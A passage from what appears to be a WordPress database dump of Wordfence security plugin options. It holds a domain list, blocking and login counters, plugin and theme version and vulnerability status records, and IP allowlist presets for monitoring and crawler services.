s|xn--fiqz9s|xn--wgbh1c|lamborghini|motorcycles|playstation|progressive|xn--unup4y|redumbrella|williamhill|xn--11b4c3d|xn--1ck2e1b|xn--1qqw23a|xn--2scrj9c|xn--30rr7y|xn--pssy2u|xn--q7ce6a|xn--3bst00m|xn--3ds443g|xn--3hcrj9c|xn--3pxu8k|xn--o3cw4h|xn--42c2d9a|xn--mxtq1m|xn--wgbl6a|xn--45brj9c|xn--45q11c|xn--4gbrim|xn--9et52u|xn--czrs0t|xn--kput3i|xn--55qw42g|xn--55qx5d|xn--5tzm5g|xn--6frz82g|xn--80ao21a|xn--80aswg|xn--90a3ac|xn--9dbq2a|xn--9krt00a|xn--c2br7g|xn--cck2b3b|xn--cg4bki|xn--czr694b|xn--czru2d|xn--d1acj3b|xn--efvy88h|xn--fjq720a|xn--flw351e|xn--g2xx48c|xn--y9a3aq|xn--fct429k|xn--gecrj9c|xn--jvr189m|xn--45br5cyl|xn--4dbrk0ce|xn--80adxhks|xn--80asehdb|xn--8y0a063a|xn--gckr3f0f|xn--gk3at1e|xn--rhqv96g|xn--rovu88b|xn--3e0b707e|xn--xhq521b|travelchannel|wolterskluwer|xn--s9brj9c|xn--ses554g|lplfinancial|xn--qcka1pmc|xn--t60b56a|versicherung|lifeinsurance|xn--vuq861b|xn--w4rs40l|xn--cckwcxetd|xn--zfr164b|weatherchannel|xn--80aqecdr1a|xn--eckvdtc9d|northwesternmutual|xn--fiq228c5hs|xn--fpcrj9c3d|travelersinsurance|xn--3oq18vl8pn36a|xn--fzc2c9e2c|xn--54b7fta0cc|xn--6qq986b3xl|xn--b4w605ferd|xn--fzys8d69uvgm|xn--tiq49xqyj|xn--ygbi2ammx|xn--bck1b9a5dre4c|xn--h2brj9c|xn--clchc0ea0b2g2a9gcd|xn--q9jyb4c|xn--yfro4i67o|xn--h2breg3eve|xn--h2brj9c8c|xn--io0a7i|xn--hxt814e|xn--j1aef|xn--j1amh|xn--imr513n|xn--j6w193g|xn--kprw13d|xn--kpry57d|xn--mgbbh1a|xn--mgb9awbf|xn--jlq480n2rg|xn--mgba3a3ejt|xn--lgbbat1ad8j|xn--mgbpl2fh|xn--jlq61u9w7b|xn--mgbayh7gpa|xn--mgbbh1a71e|xn--mgbca7dzdo|xn--mgba3a4f16a|xn--mgbab2bd|xn--mgbaam7a8h|xn--mgbaakc7dvf|xn--mgbah1a3hjkrd|xn--mgbai9azgqp6j|xn--mgbc0a9azcg|xn--mgba7c0bbn0a|xn--mgbgu82a|xn--mgbcpq6gpa1a|xn--mgbt3dhd|xn--mgberp4a5d4ar|xn--ngbc5azd|xn--kcrx77d1x4a|xn--mgbtx2b|xn--i1b6b1a6a2e|xn--mix891f|xn--nyqy26a|xn--otu796d|xn--mk1bu44c|xn--mgbi4ecexp|xn--ngbe9e0a|xn--mgbx4cd0ab|xn--nqv7fs00ema|xn--ogbpf8fl|xn--pgbs0dh|xn--rvc1e0am3e|xn--5su34j936bgsg|xn--w4r85el8fhu5dnra|xn--vermgensberater-ctb|xn--vermgensberatung-pwb|xn--xkc2al3hye2a|xn--xkc2dl3a5ee0h|','yes'),('tldlistHash','3694aa48ec18a722435a817d284b52e282d032d11ca43c36e94d9e03b5ca922a','yes'),('total503s','2501','yes'),('totalAlertsSent','3','yes'),('totalIPsBlocked','2503','yes'),('totalIPsLocked','1','yes'),('totalLoginHits','10765','yes'),('totalLogins','1','yes'),('totalScansRun','70','yes'),('touppBypassNextCheck','0','yes'),('touppPromptNeeded','1','yes'),('vulnerabilities_plugin','a:5:{i:0;a:5:{s:4:\"slug\";s:7:\"akismet\";s:9:\"toVersion\";s:6:\"4.1.11\";s:11:\"fromVersion\";s:5:\"4.1.9\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:1;a:5:{s:4:\"slug\";s:35:\"all-in-one-wp-security-and-firewall\";s:9:\"toVersion\";s:5:\"4.4.9\";s:11:\"fromVersion\";s:5:\"4.4.8\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:2;a:5:{s:4:\"slug\";s:9:\"wordfence\";s:9:\"toVersion\";s:5:\"7.5.5\";s:11:\"fromVersion\";s:5:\"7.5.4\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:3;a:5:{s:4:\"slug\";s:9:\"wp-cerber\";s:9:\"toVersion\";s:5:\"8.9.3\";s:11:\"fromVersion\";s:5:\"8.8.5\";s:10:\"vulnerable\";b:1;s:4:\"link\";s:73:\"https://wpvulndb.com/vulnerabilities/0c06abf1-f01f-4268-a105-02b1327427cf\";}i:4;a:4:{s:4:\"slug\";s:11:\"hello-dolly\";s:11:\"fromVersion\";s:5:\"1.7.2\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}}','yes'),('vulnerabilities_theme','a:29:{i:0;a:4:{s:4:\"slug\";s:7:\"advance\";s:9:\"toVersion\";s:5:\"1.9.0\";s:11:\"fromVersion\";s:5:\"1.1.9\";s:10:\"vulnerable\";b:0;}i:1;a:4:{s:4:\"slug\";s:7:\"auberge\";s:9:\"toVersion\";s:5:\"2.7.6\";s:11:\"fromVersion\";s:5:\"2.1.1\";s:10:\"vulnerable\";b:0;}i:2;a:4:{s:4:\"slug\";s:12:\"catch-flames\";s:9:\"toVersion\";s:3:\"3.6\";s:11:\"fromVersion\";s:3:\"3.2\";s:10:\"vulnerable\";b:0;}i:3;a:4:{s:4:\"slug\";s:16:\"catch-responsive\";s:9:\"toVersion\";s:5:\"2.7.8\";s:11:\"fromVersion\";s:3:\"2.5\";s:10:\"vulnerable\";b:0;}i:4;a:4:{s:4:\"slug\";s:7:\"chronus\";s:9:\"toVersion\";s:5:\"2.0.4\";s:11:\"fromVersion\";s:5:\"1.2.2\";s:10:\"vulnerable\";b:0;}i:5;a:4:{s:4:\"slug\";s:10:\"city-store\";s:9:\"toVersion\";s:5:\"1.4.5\";s:11:\"fromVersion\";s:5:\"1.3.3\";s:10:\"vulnerable\";b:0;}i:6;a:4:{s:4:\"slug\";s:4:\"edge\";s:9:\"toVersion\";s:5:\"2.0.6\";s:11:\"fromVersion\";s:7:\"1.1.1.1\";s:10:\"vulnerable\";b:0;}i:7;a:4:{s:4:\"slug\";s:13:\"education-hub\";s:9:\"toVersion\";s:5:\"2.3.2\";s:11:\"fromVersion\";s:5:\"1.9.4\";s:10:\"vulnerable\";b:0;}i:8;a:4:{s:4:\"slug\";s:6:\"enigma\";s:9:\"toVersion\";s:5:\"7.1.9\";s:11:\"fromVersion\";s:5:\"2.8.2\";s:10:\"vulnerable\";b:0;}i:9;a:4:{s:4:\"slug\";s:5:\"event\";s:9:\"toVersion\";s:5:\"1.1.8\";s:11:\"fromVersion\";s:5:\"1.0.7\";s:10:\"vulnerable\";b:0;}i:10;a:4:{s:4:\"slug\";s:9:\"exoplanet\";s:9:\"toVersion\";s:5:\"1.9.1\";s:11:\"fromVersion\";s:5:\"1.5.6\";s:10:\"vulnerable\";b:0;}i:11;a:4:{s:4:\"slug\";s:6:\"gambit\";s:9:\"toVersion\";s:5:\"2.0.3\";s:11:\"fromVersion\";s:5:\"1.0.8\";s:10:\"vulnerable\";b:0;}i:12;a:4:{s:4:\"slug\";s:8:\"graduate\";s:9:\"toVersion\";s:5:\"1.6.0\";s:11:\"fromVersion\";s:3:\"1.2\";s:10:\"vulnerable\";b:0;}i:13;a:4:{s:4:\"slug\";s:8:\"graphene\";s:9:\"toVersion\";s:5:\"2.8.5\";s:11:\"fromVersion\";s:7:\"1.9.4.2\";s:10:\"vulnerable\";b:0;}i:14;a:4:{s:4:\"slug\";s:9:\"hemingway\";s:9:\"toVersion\";s:5:\"2.1.2\";s:11:\"fromVersion\";s:4:\"1.56\";s:10:\"vulnerable\";b:0;}i:15;a:4:{s:4:\"slug\";s:6:\"hitmag\";s:9:\"toVersion\";s:5:\"1.2.9\";s:11:\"fromVersion\";s:5:\"1.0.9\";s:10:\"vulnerable\";b:0;}i:16;a:4:{s:4:\"slug\";s:9:\"lovecraft\";s:9:\"toVersion\";s:5:\"2.0.1\";s:11:\"fromVersion\";s:4:\"1.17\";s:10:\"vulnerable\";b:0;}i:17;a:4:{s:4:\"slug\";s:14:\"metro-magazine\";s:9:\"toVersion\";s:5:\"1.3.6\";s:11:\"fromVersion\";s:5:\"1.0.6\";s:10:\"vulnerable\";b:0;}i:18;a:4:{s:4:\"slug\";s:9:\"monograph\";s:9:\"toVersion\";s:5:\"1.6.1\";s:11:\"fromVersion\";s:5:\"1.4.1\";s:10:\"vulnerable\";b:0;}i:19;a:4:{s:4:\"slug\";s:7:\"newsmag\";s:9:\"toVersion\";s:5:\"2.4.3\";s:11:\"fromVersion\";s:5:\"2.1.6\";s:10:\"vulnerable\";b:0;}i:20;a:4:{s:4:\"slug\";s:9:\"quicksand\";s:9:\"toVersion\";s:5:\"0.7.0\";s:11:\"fromVersion\";s:5:\"0.6.9\";s:10:\"vulnerable\";b:0;}i:21;a:4:{s:4:\"slug\";s:11:\"saybusiness\";s:9:\"toVersion\";s:5:\"1.1.7\";s:11:\"fromVersion\";s:5:\"1.1.4\";s:10:\"vulnerable\";b:0;}i:22;a:4:{s:4:\"slug\";s:11:\"singularity\";s:9:\"toVersion\";s:6:\"1.0.11\";s:11:\"fromVersion\";s:5:\"1.0.9\";s:10:\"vulnerable\";b:0;}i:23;a:4:{s:4:\"slug\";s:8:\"the-best\";s:9:\"toVersion\";s:5:\"1.3.1\";s:11:\"fromVersion\";s:5:\"1.0.9\";s:10:\"vulnerable\";b:0;}i:24;a:4:{s:4:\"slug\";s:14:\"twentynineteen\";s:9:\"toVersion\";s:3:\"2.1\";s:11:\"fromVersion\";s:3:\"2.0\";s:10:\"vulnerable\";b:0;}i:25;a:4:{s:4:\"slug\";s:12:\"twentytwenty\";s:9:\"toVersion\";s:3:\"1.8\";s:11:\"fromVersion\";s:3:\"1.7\";s:10:\"vulnerable\";b:0;}i:26;a:4:{s:4:\"slug\";s:15:\"twentytwentyone\";s:9:\"toVersion\";s:3:\"1.4\";s:11:\"fromVersion\";s:3:\"1.3\";s:10:\"vulnerable\";b:0;}i:27;a:4:{s:4:\"slug\";s:14:\"university-hub\";s:9:\"toVersion\";s:3:\"2.1\";s:11:\"fromVersion\";s:5:\"1.0.4\";s:10:\"vulnerable\";b:0;}i:28;a:4:{s:4:\"slug\";s:6:\"weblog\";s:9:\"toVersion\";s:5:\"3.0.4\";s:11:\"fromVersion\";s:5:\"1.0.1\";s:10:\"vulnerable\";b:0;}}','yes'),('wafAlertInterval','600','yes'),('wafAlertOnAttacks','1','yes'),('wafAlertThreshold','100','yes'),('wafAlertWhitelist','','yes'),('waf_status','enabled','yes'),('wfKillRequested','0','no'),('wfPeakMemory','6291456','no'),('wfScanStartVersion','5.7.2','yes'),('wfsd_engine','','no'),('wfStatusStartMsgs','a:2:{i:0;s:0:\"\";i:1;s:0:\"\";}','yes'),('wf_scanLastStatusTime','0','yes'),('wf_scanRunning','','yes'),('wf_summaryItems','a:8:{s:12:\"scannedPosts\";i:0;s:15:\"scannedComments\";i:0;s:12:\"scannedFiles\";i:0;s:14:\"scannedPlugins\";i:0;s:13:\"scannedThemes\";i:0;s:12:\"scannedUsers\";i:0;s:11:\"scannedURLs\";i:0;s:10:\"lastUpdate\";i:1629801262;}','yes'),('whitelisted','','yes'),('whitelistedServices','{}','yes'),('whitelistHash','bf3d76dc05caf8623cb3fe01c1fc9e308e2f2ea37b826937d850fde361cdefd4','yes'),('whitelistPresets','{\"wordfence\":{\"n\":\"Wordfence\",\"h\":true,\"d\":true,\"f\":true,\"r\":[\"54.68.32.247\",\"69.46.36.0\\/27\",\"2605:2400:0104:0100::\\/56\"]},\"sucuri\":{\"n\":\"Sucuri\",\"d\":true,\"r\":[\"97.74.127.171\",\"69.164.203.172\",\"173.230.128.135\",\"66.228.34.49\",\"66.228.40.185\",\"50.116.36.92\",\"50.116.36.93\",\"50.116.3.171\",\"198.58.96.212\",\"50.116.63.221\",\"192.155.92.112\",\"192.81.128.31\",\"198.58.106.244\",\"192.155.95.139\",\"23.239.9.227\",\"198.58.112.103\",\"192.155.94.43\",\"162.216.16.33\",\"173.255.233.124\",\"173.255.233.124\",\"192.155.90.179\",\"50.116.41.217\",\"192.81.129.227\",\"198.58.111.80\",\"162.216.19.183\"]},\"facebook\":{\"n\":\"Facebook\",\"d\":true,\"r\":[\"69.63.176.0\\/20\",\"66.220.144.0\\/20\",\"66.220.144.0\\/21\",\"69.63.184.0\\/21\",\"69.63.176.0\\/21\",\"74.119.76.0\\/22\",\"69.171.255.0\\/24\",\"173.252.64.0\\/18\",\"69.171.224.0\\/19\",\"69.171.224.0\\/20\",\"103.4.96.0\\/22\",\"69.63.176.0\\/24\",\"173.252.64.0\\/19\",\"173.252.70.0\\/24\",\"31.13.64.0\\/18\",\"31.13.24.0\\/21\",\"66.220.152.0\\/21\",\"66.220.159.0\\/24\",\"69.171.239.0\\/24\",\"69.171.240.0\\/20\",\"31.13.64.0\\/19\",\"31.13.64.0\\/24\",\"31.13.65.0\\/24\",\"31.13.67.0\\/24\",\"31.13.68.0\\/24\",\"31.13.69.0\\/24\",\"31.13.70.0\\/24\",\"31.13.71.0\\/24\",\"31.13.72.0\\/24\",\"31.13.73.0\\/24\",\"31.13.74.0\\/24\",\"31.13.75.0\\/24\",\"31.13.76.0\\/24\",\"31.13.77.0\\/24\",\"31.13.96.0\\/19\",\"31.13.66.0\\/24\",\"173.252.96.0\\/19\",\"69.63.178.0\\/24\",\"31.13.78.0\\/24\",\"31.13.79.0\\/24\",\"31.13.80.0\\/24\",\"31.13.82.0\\/24\",\"31.13.83.0\\/24\",\"31.13.84.0\\/24\",\"31.13.85.0\\/24\",\"31.13.86.0\\/24\",\"31.13.87.0\\/24\",\"31.13.88.0\\/24\",\"31.13.89.0\\/24\",\"31.13.90.0\\/24\",\"31.13.91.0\\/24\",\"31.13.92.0\\/24\",\"31.13.93.0\\/24\",\"31.13.94.0\\/24\",\"31.13.95.0\\/24\",\"69.171.253.0\\/24\",\"69.63.186.0\\/24\",\"31.13.81.0\\/24\",\"179.60.192.0\\/22\",\"179.60.192.0\\/24\",\"179.60.193.0\\/24\",\"179.60.194.0\\/24\",\"179.60.195.0\\/24\",\"185.60.216.0\\/22\",\"45.64.40.0\\/22\",\"185.60.216.0\\/24\",\"185.60.217.0\\/24\",\"185.60.218.0\\/24\",\"185.60.219.0\\/24\",\"129.134.0.0\\/16\",\"157.240.0.0\\/16\",\"157.240.8.0\\/24\",\"157.240.0.0\\/24\",\"157.240.1.0\\/24\",\"157.240.2.0\\/24\",\"157.240.3.0\\/24\",\"157.240.4.0\\/24\",\"157.240.5.0\\/24\",\"157.240.6.0\\/24\",\"157.240.7.0\\/24\",\"157.240.9.0\\/24\",\"157.240.10.0\\/24\",\"157.240.16.0\\/24\",\"157.240.19.0\\/24\",\"157.240.11.0\\/24\",\"157.240.12.0\\/24\",\"157.240.13.0\\/24\",\"157.240.14.0\\/24\",\"157.240.15.0\\/24\",\"157.240.17.0\\/24\",\"157.240.18.0\\/24\",\"157.240.20.0\\/24\",\"157.240.21.0\\/24\",\"157.240.22.0\\/24\",\"157.240.23.0\\/24\",\"157.240.0.0\\/17\",\"69.171.250.0\\/24\",\"157.240.24.0\\/24\",\"157.240.25.0\\/24\",\"199.201.64.0\\/24\",\"199.201.65.0\\/24\",\"199.201.64.0\\/22\",\"204.15.20.0\\/22\",\"157.240.192.0\\/24\",\"129.134.0.0\\/17\",\"204.15.20.0\\/22\",\"69.63.176.0\\/20\",\"69.63.176.0\\/21\",\"69.63.184.0\\/21\",\"66.220.144.0\\/20\",\"69.63.176.0\\/20\",\"2620:0:1c00::\\/40\",\"2a03:2880::\\/32\",\"2a03:2880:fffe::\\/48\",\"2a03:2880:ffff::\\/48\",\"2620:0:1cff::\\/48\",\"2a03:2880:f000::\\/48\",\"2a03:2880:f001::\\/48\",\"2a03:2880:f002::\\/48\",\"2a03:2880:f003::\\/48\",\"2a03:2880:f004::\\/48\",\"2a03:2880:f005::\\/48\",\"2a03:2880:f006::\\/48\",\"2a03:2880:f007::\\/48\",\"2a03:2880:f008::\\/48\",\"2a03:2880:f009::\\/48\",\"2a03:2880:f00a::\\/48\",\"2a03:2880:f00b::\\/48\",\"2a03:2880:f00c::\\/48\",\"2a03:2880:f00d::\\/48\",\"2a03:2880:f00e::\\/48\",\"2a03:2880:f00f::\\/48\",\"2a03:2880:f010::\\/48\",\"2a03:2880:f011::\\/48\",\"2a03:2880:f012::\\/48\",\"2a03:2880:f013::\\/48\",\"2a03:2880:f014::\\/48\",\"2a03:2880:f015::\\/48\",\"2a03:2880:f016::\\/48\",\"2a03:2880:f017::\\/48\",\"2a03:2880:f018::\\/48\",\"2a03:2880:f019::\\/48\",\"2a03:2880:f01a::\\/48\",\"2a03:2880:f01b::\\/48\",\"2a03:2880:f01c::\\/48\",\"2a03:2880:f01d::\\/48\",\"2a03:2880:f01e::\\/48\",\"2a03:2880:f01f::\\/48\",\"2a03:2880:1000::\\/36\",\"2a03:2880:2000::\\/36\",\"2a03:2880:3000::\\/36\",\"2a03:2880:4000::\\/36\",\"2a03:2880:5000::\\/36\",\"2a03:2880:6000::\\/36\",\"2a03:2880:7000::\\/36\",\"2a03:2880:f020::\\/48\",\"2a03:2880:f021::\\/48\",\"2a03:2880:f022::\\/48\",\"2a03:2880:f023::\\/48\",\"2a03:2880:f024::\\/48\",\"2a03:2880:f025::\\/48\",\"2a03:2880:f026::\\/48\",\"2a03:2880:f027::\\/48\",\"2a03:2880:f028::\\/48\",\"2a03:2880:f029::\\/48\",\"2a03:2880:f02b::\\/48\",\"2a03:2880:f02c::\\/48\",\"2a03:2880:f02d::\\/48\",\"2a03:2880:f02e::\\/48\",\"2a03:2880:f02f::\\/48\",\"2a03:2880:f030::\\/48\",\"2a03:2880:f031::\\/48\",\"2a03:2880:f032::\\/48\",\"2a03:2880:f033::\\/48\",\"2a03:2880:f034::\\/48\",\"2a03:2880:f035::\\/48\",\"2a03:2880:f036::\\/48\",\"2a03:2880:f037::\\/48\",\"2a03:2880:f038::\\/48\",\"2a03:2880:f039::\\/48\",\"2a03:2880:f03a::\\/48\",\"2a03:2880:f03b::\\/48\",\"2a03:2880:f03c::\\/48\",\"2a03:2880:f03d::\\/48\",\"2a03:2880:f03e::\\/48\",\"2a03:2880:f03f::\\/48\",\"2401:db00::\\/32\",\"2a03:2880::\\/36\",\"2803:6080::\\/32\",\"2a03:2880:f100::\\/48\",\"2a03:2880:f200::\\/48\",\"2a03:2880:f101::\\/48\",\"2a03:2880:f201::\\/48\",\"2a03:2880:f102::\\/48\",\"2a03:2880:f202::\\/48\",\"2a03:2880:f103::\\/48\",\"2a03:2880:f203::\\/48\",\"2a03:2880:f104::\\/48\",\"2a03:2880:f204::\\/48\",\"2a03:2880:f107::\\/48\",\"2a03:2880:f207::\\/48\",\"2a03:2880:f108::\\/48\",\"2a03:2880:f208::\\/48\",\"2a03:2880:f109::\\/48\",\"2a03:2880:f209::\\/48\",\"2a03:2880:f10a::\\/48\",\"2a03:2880:f20a::\\/48\",\"2a03:2880:f10b::\\/48\",\"2a03:2880:f20b::\\/48\",\"2a03:2880:f10d::\\/48\",\"2a03:2880:f20d::\\/48\",\"2a03:2880:f10e::\\/48\",\"2a03:2880:f20e::\\/48\",\"2a03:2880:f10f::\\/48\",\"2a03:2880:f20f::\\/48\",\"2a03:2880:f110::\\/48\",\"2a03:2880:f210::\\/48\",\"2a03:2880:f111::\\/48\",\"2a03:2880:f211::\\/48\",\"2a03:2880:f112::\\/48\",\"2a03:2880:f212::\\/48\",\"2a03:2880:f114::\\/48\",\"2a03:2880:f214::\\/48\",\"2a03:2880:f115::\\/48\",\"2a03:2880:f215::\\/48\",\"2a03:2880:f116::\\/48\",\"2a03:2880:f216::\\/48\",\"2a03:2880:f117::\\/48\",\"2a03:2880:f217::\\/48\",\"2a03:2880:f118::\\/48\",\"2a03:2880:f218::\\/48\",\"2a03:2880:f119::\\/48\",\"2a03:2880:f219::\\/48\",\"2a03:2880:f11a::\\/48\",\"2a03:2880:f21a::\\/48\",\"2a03:2880:f11f::\\/48\",\"2a03:2880:f21f::\\/48\",\"2a03:2880:f121::\\/48\",\"2a03:2880:f221::\\/48\",\"2a03:2880:f122::\\/48\",\"2a03:2880:f222::\\/48\",\"2a03:2880:f123::\\/48\",\"2a03:2880:f223::\\/48\",\"2a03:2880:f10c::\\/48\",\"2a03:2880:f20c::\\/48\",\"2a03:2880:f126::\\/48\",\"2a03:2880:f226::\\/48\",\"2a03:2880:f105::\\/48\",\"2a03:2880:f205::\\/48\",\"2a03:2880:f125::\\/48\",\"2a03:2880:f225::\\/48\",\"2a03:2880:f106::\\/48\",\"2a03:2880:f206::\\/48\",\"2a03:2880:f11b::\\/48\",\"2a03:2880:f21b::\\/48\",\"2a03:2880:f113::\\/48\",\"2a03:2880:f213::\\/48\",\"2a03:2880:f11c::\\/48\",\"2a03:2880:f21c::\\/48\",\"2a03:2880:f128::\\/48\",\"2a03:2880:f228::\\/48\",\"2a03:2880:f02a::\\/48\",\"2a03:2880:f12a::\\/48\",\"2a03:2880:f22a::\\/48\",\"2a03:2880:f12f::\\/48\",\"2a03:2880:f22f::\\/48\",\"2a03:2880:f11d::\\/48\",\"2a03:2880:f11e::\\/48\",\"2a03:2880:f120::\\/48\",\"2a03:2880:f124::\\/48\",\"2a03:2880:f127::\\/48\",\"2a03:2880:f129::\\/48\",\"2a03:2880:f12b::\\/48\",\"2a03:2880:f12c::\\/48\",\"2a03:2880:f12d::\\/48\",\"2a03:2880:f12e::\\/48\",\"2a03:2880:f130::\\/48\",\"2a03:2880:f131::\\/48\",\"2a03:2880:f132::\\/48\",\"2a03:2880:f133::\\/48\",\"2a03:2880:f134::\\/48\",\"2a03:2880:f135::\\/48\",\"2a03:2880:f136::\\/48\",\"2a03:2880:f137::\\/48\",\"2a03:2880:f138::\\/48\",\"2a03:2880:f139::\\/48\",\"2a03:2880:f13a::\\/48\",\"2a03:2880:f13b::\\/48\",\"2a03:2880:f13c::\\/48\",\"2a03:2880:f13d::\\/48\",\"2a03:2880:f13e::\\/48\",\"2a03:2880:f13f::\\/48\",\"2a03:2880:f21d::\\/48\",\"2a03:2880:f21e::\\/48\",\"2a03:2880:f220::\\/48\",\"2a03:2880:f224::\\/48\",\"2a03:2880:f227::\\/48\",\"2a03:2880:f229::\\/48\",\"2a03:2880:f22b::\\/48\",\"2a03:2880:f22c::\\/48\",\"2a03:2880:f22d::\\/48\",\"2a03:2880:f22e::\\/48\",\"2a03:2880:f230::\\/48\",\"2a03:2880:f231::\\/48\",\"2a03:2880:f232::\\/48\",\"2a03:2880:f233::\\/48\",\"2a03:2880:f234::\\/48\",\"2a03:2880:f235::\\/48\",\"2a03:2880:f236::\\/48\",\"2a03:2880:f237::\\/48\",\"2a03:2880:f238::\\/48\",\"2a03:2880:f239::\\/48\",\"2a03:2880:f23a::\\/48\",\"2a03:2880:f23b::\\/48\",\"2a03:2880:f23c::\\/48\",\"2a03:2880:f23d::\\/48\",\"2a03:2880:f23e::\\/48\",\"2a03:2880:f23f::\\/48\",\"2a03:2880:f0ff::\\/48\",\"2a03:2880:f1ff::\\/48\",\"2a03:2880:f2ff::\\/48\",\"2c0f:ef78:0003::\\/48\"]},\"uptimerobot\":{\"n\":\"Uptime Robot\",\"d\":true,\"r\":[\"69.162.124.224\\/28\",\"63.143.42.240\\/28\"]},\"statuscake\":{\"n\":\"StatusCake\",\"d\":true,\"r\":[\"103.194.112.70\",\"104.131.247.151\",\"104.131.248.65\",\"104.131.248.78\",\"104.156.229.24\",\"104.156.255.184\",\"104.206.168.26\",\"104.238.164.105\",\"107.150.1.135\",\"107.155.104.182\",\"107.155.108.234\",\"107.155.125.29\",\"107.161.28.219\",\"107.170.197.248\",\"107.170.219.46\",\"107.170.227.23\",\"107.170.227.24\",\"107.170.240.141\",\"107.170.53.191\",\"107.191.47.131\",\"107.191.57.237\",\"108.61.119.153\",\"108.61.162.214\",\"108.61.205.201\",\"108.61.212.141\",\"108.61.215.179\",\"125.63.48.239\",\"128.199.222.65\",\"138.197.130.232\",\"138.197.130.235\",\"138.197.140.243\",\"138.204.171.136\",\"138.68.24.115\",\"138.68.24.136\",\"138.68.24.207\",\"138.68.24.60\",\"138.68.80.10\",\"138.68.80.173\",\"139.59.15.79\",\"139.59.155.26\",\"139.59.190.241\",\"139.59.22.109\",\"139.59.26.85\",\"139.59.29.167\",\"149.154.157.61\",\"149.255.59.100\",\"151.236.10.238\",\"151.236.18.80\",\"151.80.175.223\",\"151.80.175.226\",\"154.127.60.23\",\"154.127.60.59\",\"158.255.208.76\",\"159.203.182.22\",\"159.203.182.60\",\"159.203.186.225\",\"159.203.31.18\",\"162.243.247.163\",\"162.243.71.56\",\"162.248.97.72\",\"162.253.64.104\",\"162.253.64.87\",\"176.56.230.110\",\"178.62.101.57\",\"178.62.104.137\",\"178.62.106.84\",\"178.62.109.7\",\"178.62.40.233\",\"178.62.41.44\",\"178.62.41.49\",\"178.62.41.52\",\"178.62.65.162\",\"178.62.71.227\",\"178.62.78.199\",\"178.62.80.93\",\"178.62.86.69\",\"178.73.210.99\",\"181.41.201.117\",\"181.41.214.137\",\"185.112.157.185\",\"185.12.45.70\",\"185.47.129.168\",\"185.60.135.86\",\"188.166.158.224\",\"188.166.253.148\",\"188.226.139.158\",\"188.226.158.160\",\"188.226.169.228\",\"188.226.171.58\",\"188.226.184.152\",\"188.226.185.106\",\"188.226.186.199\",\"188.226.203.84\",\"188.226.247.184\",\"188.68.238.79\",\"192.241.221.11\",\"193.124.178.54\",\"193.124.178.61\",\"193.182.144.105\",\"193.182.144.147\",\"199.167.128.80\",\"209.222.30.242\",\"213.183.56.107\",\"217.148.43.188\",\"217.148.43.202\",\"31.220.7.237\",\"37.157.246.146\",\"37.235.48.42\",\"37.235.52.25\",\"37.235.53.240\",\"37.235.55.205\",\"37.97.188.103\",\"45.32.128.80\",\"45.32.145.79\",\"45.32.151.21\",\"45.32.160.172\",\"45.32.166.195\",\"45.32.171.24\",\"45.32.192.198\",\"45.32.195.186\",\"45.32.195.93\",\"45.32.212.56\",\"45.32.36.158\",\"45.32.7.22\",\"45.63.121.159\",\"45.63.26.78\",\"45.63.51.63\",\"45.63.61.213\",\"45.63.76.68\",\"45.63.78.84\",\"45.63.86.120\",\"45.63.88.213\",\"45.76.1.44\",\"45.76.192.50\",\"45.76.3.112\",\"46.101.0.24\",\"46.101.110.32\",\"46.101.110.43\",\"46.101.110.45\",\"46.101.20.96\",\"46.101.238.182\",\"46.101.238.189\",\"46.101.240.208\",\"46.101.27.186\",\"46.101.61.83\",\"46.101.74.251\",\"5.45.179.103\",\"50.2.139.16\",\"82.221.95.161\",\"91.236.116.163\"]},\"managewp\":{\"n\":\"ManageWP\",\"d\":false,\"r\":[\"34.211.180.66\",\"54.70.65.107\",\"34.210.224.7\",\"52.41.5.108\",\"52.35.72.129\",\"54.191.137.17\",\"35.162.254.253\",\"52.11.12.231\",\"52.11.29.70\",\"52.11.54.161\",\"52.24.142.159\",\"52.25.191.255\",\"52.27.181.126\",\"52.34.126.117\",\"52.34.254.47\",\"52.35.82.99\",\"52.36.28.80\",\"52.38.106.97\",\"52.39.177.152\",\"52.41.230.148\",\"52.41.237.12\",\"52.42.126.166\",\"52.43.13.71\",\"52.43.76.224\",\"52.88.96.110\",\"52.89.155.51\",\"54.148.73.118\",\"54.186.37.105\",\"54.187.92.57\",\"54.191.32.65\",\"54.191.67.23\",\"54.191.80.119\",\"54.191.135.209\",\"54.191.136.176\",\"54.191.148.85\",\"54.191.149.8\",\"52.26.122.21\",\"52.24.187.29\",\"52.89.85.107\",\"54.186.128.167\",\"54.191.40.136\",\"52.24.62.11\",\"52.88.119.122\",\"54.191.148.225\",\"54.191.151.18\",\"52.89.94.121\",\"52.25.116.116\",\"52.88.215.225\",\"54.186.143.184\",\"52.88.197.180\",\"52.27.171.126\"]},\"seznam\":{\"n\":\"Seznam Search Engine\",\"d\":true,\"r\":[\"77.75.74.0\\/24\",\"77.75.76.0\\/24\",\"77.75.77.0\\/24\",\"77.75.78.0\\/24\",\"77.75.79.0\\/24\",\"2a02:598:a::78:0\\/112\",\"2a02:598:a::79:0\\/112\",\"2a02:598:2::0\\/96\"]}}','yes'),('wordfenceI18n','1','yes'),('wordpressPluginVersions','a:5:{s:7:\"akismet\";s:5:\"4.1.9\";s:35:\"all-in-one-wp-security-and-firewall\";s:5:\"4.4.8\";s:5:\"hello\";s:5:\"1.7.2\";s:9:\"wordfence\";s:5:\"7.5.4\";s:9:\"wp-cerber\";s:5:\"8.8.5\";}','yes'),('wordpressThemeVersions','a:38:{s:6:\"Endolf\";s:3:\"1.1\";s:4:\"Kent\";s:3:\"1.2\";s:5:\"Yegor\";s:3:\"1.2\";s:7:\"advance\";s:5:\"1.1.9\";s:7:\"auberge\";s:5:\"2.1.1\";s:9:\"authorize\";s:5:\"1.0.7\";s:9:\"brickyard\";s:5:\"2.0.3\";s:12:\"catch-flames\";s:3:\"3.2\";s:16:\"catch-responsive\";s:3:\"2.5\";s:7:\"chronus\";s:5:\"1.2.2\";s:10:\"city-store\";s:5:\"1.3.3\";s:4:\"edge\";s:7:\"1.1.1.1\";s:13:\"education-hub\";s:5:\"1.9.4\";s:6:\"enigma\";s:5:\"2.8.2\";s:5:\"event\";s:5:\"1.0.7\";s:9:\"exoplanet\";s:5:\"1.5.6\";s:6:\"gambit\";s:5:\"1.0.8\";s:8:\"gildrest\";s:5:\"1.0.3\";s:8:\"graduate\";s:3:\"1.2\";s:8:\"graphene\";s:7:\"1.9.4.2\";s:9:\"hemingway\";s:4:\"1.56\"